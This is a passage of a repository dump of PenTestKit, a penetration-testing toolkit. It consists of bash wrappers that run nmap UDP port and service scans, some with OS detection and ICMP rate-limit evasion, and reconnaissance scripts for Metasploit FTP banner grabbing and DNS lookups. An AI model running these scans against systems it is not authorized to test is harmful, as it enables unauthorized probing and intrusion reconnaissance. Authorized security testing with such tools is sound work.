27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -vv -p- --reason --open -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -Pn -vv -p- --reason --open -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -Pn -vv -p- --reason --open --defeat-icmp-ratelimit -T4 -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -vv -p- --reason --open -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-fast-scan-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 | 	nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -T4 -oA udp_services_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 | 	nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -oA udp_services_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA udp_services_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-top400-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 400 --open -oA udp_services_400_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-super-fast-scan-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 | 	nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -T4 --defeat-icmp-ratelimit -oA udp_services_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -T4 -oA udp_ports_top1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -vv --top-ports 1000 --reason --open -oA udp_ports_top1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -oA udp_ports_top1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -vv --top-ports 1000 -Pn --reason --open -oA udp_ports_top1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -n -Pn -vv --top-ports 1000 --reason --open --defeat-icmp-ratelimit -T4 -oA udp_ports_top1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 |     nmap -sU -vv --top-ports 1000 --reason --open -oA udp_ports_full_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/reconnaissance/ftp-banner.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | msfconsole -n -q -r - << EOF
27 | use auxiliary/scanner/ftp/ftp_version
28 | set RHOSTS $1
29 | run
30 | exit
31 | EOF
32 | else
33 |     echo "Please provide the target ftp server."
34 | fi
35 | 


--------------------------------------------------------------------------------
/reconnaissance/hostname.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	LOGNAME="ip_hostname_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g')
28 |   	LOGNAME="$LOGNAME.txt"
29 |   	echo -n "$1    "
30 | 	nslookup $1 | grep 'name' | cut -f2 | sed 's/name = //' | sed ':a;N;$!ba;s/\n/    /g' | tee -a $LOGNAME
31 | 	echo
32 | else
33 |     echo "Please provide the target IP address."
34 | fi
35 | 


--------------------------------------------------------------------------------
/reconnaissance/ip.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	host $1|grep "has address"|cut -d" " -f4
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/reconnaissance/ips.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	while read line || [[ -n "$line" ]]; do
27 | 		echo "IP Lookup - $line"
28 | 		host $line | grep "has address" | cut -d" " -f4 > "ip-address-$line.txt"
29 | 	done < "$1"
30 | else
31 |     echo "Please provide a file containing a list of target hosts."
32 | fi
33 | 


--------------------------------------------------------------------------------
/reconnaissance/mx.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	host -t mx $1
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/reconnaissance/nameservers.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	host -t ns $1
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 HatBashBR
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
